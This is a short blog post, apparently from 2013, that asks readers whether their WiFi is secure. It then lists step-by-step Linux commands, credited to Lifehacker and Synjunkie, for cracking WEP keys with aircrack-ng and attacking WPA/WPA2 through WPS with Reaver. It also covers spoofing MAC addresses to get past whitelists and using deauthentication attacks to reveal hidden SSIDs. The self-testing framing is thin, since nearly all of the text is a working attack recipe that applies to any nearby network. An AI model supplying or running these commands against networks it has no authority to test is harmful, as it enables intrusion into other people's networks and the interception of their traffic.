16 January 2013

Is your WiFi secure?

Have you ever hesitated about your WiFi security? You must have thought your WiFi is secure, just because you chose a humongous password or a password with special characters in it, and you assume are safe.
You are wrong. Even though you have secured your network, it might not be as secure as you imagine; no matter what your network encryption you are using WEP, WPA or WPA2. Anyone can easily follow the instructions below and crack your WiFi password.

You need a special modem (more information here) and a BackTrack linux distribution (or just kismet for two last approaches) for this matter. I suggest, if you have time, to follow these instructions and find out if your wifi is secure or not. If at the end, you found the password for your network, your network is not secure as you thought. You'd better think of ways to secure your network.

WEP

This is a short listed commands from lifehacker on how to crack your WEP wifi password.

Change mac address (Stop/Change/Start)
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
Look up networks
  • airodump-ng wlan0
Capture information in a file
  • airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
Association
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • you must get Association Successful to continue
Creating router traffic
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • look for the data# the higher the better
Crack the code
  • aircrack-ng -b (bssid) (file name-01.cap)
  • it gives you the key in double digit formats like 11:22:33:..

WPA/WPA2

These are instructions from lifehacker on how to crack your WPA/WPA2 wifi password. 

Connect to a Network
  • Click Applications > Internet > Wicd Network Manager
  • Connect to a network, enter your password if necessary. This step is needed to download Reaver.
Get Reaver
  • Open Terminal 
  • apt-get update 
  • apt-get install reaver 
Find your interface
  • iwconfig
Change mac address
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
Start Interface
  • airmon-ng start wlan0 
Look up networks
  • airodump-ng wlan0 
Crack the code
  • reaver -i mon0 -b (bssid) -vv 

MAC filtering/Whitelist MAC filtering



SSID Hiding / MAC filtering

These are summary for instructions on Synjunkie.

Find WiFi setting
  • kismet
Join networt
  • iwconfig eth1 essid batman
Obtain an IP address
  • dhclient eth1
  • (if failed there is MAC filtering, if not you joined the network at this point)
Look for valid MAC address
  • kismet
Force MAC address to disconnect
  • aireplay-ng to force a disconnection
Turning off promiscuous mode
  • ifconfig eth1 -promisc
Change MAC address
  • ifconfig eth1 down
  • ifconfig eth1 hw ether 00:16:6F:4D:AE:8C
  • ifconfig eth1 up
  • iwconfig eth1 essid batman
Request an IP address
  • dhclient eth1
Test

  • ping www.yahoo.com

SSID Hiding


Get list of network
  • airodump-ng wlan1
  • airodump-ng -c 6 --bssid 28:EF:01:35:34:85 wlan1
  • aireplay-ng -0 30 -a  28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1
SSID revealed
  • If it does not work the first time try aireplay-ng again until it works. 

No comments:

Post a Comment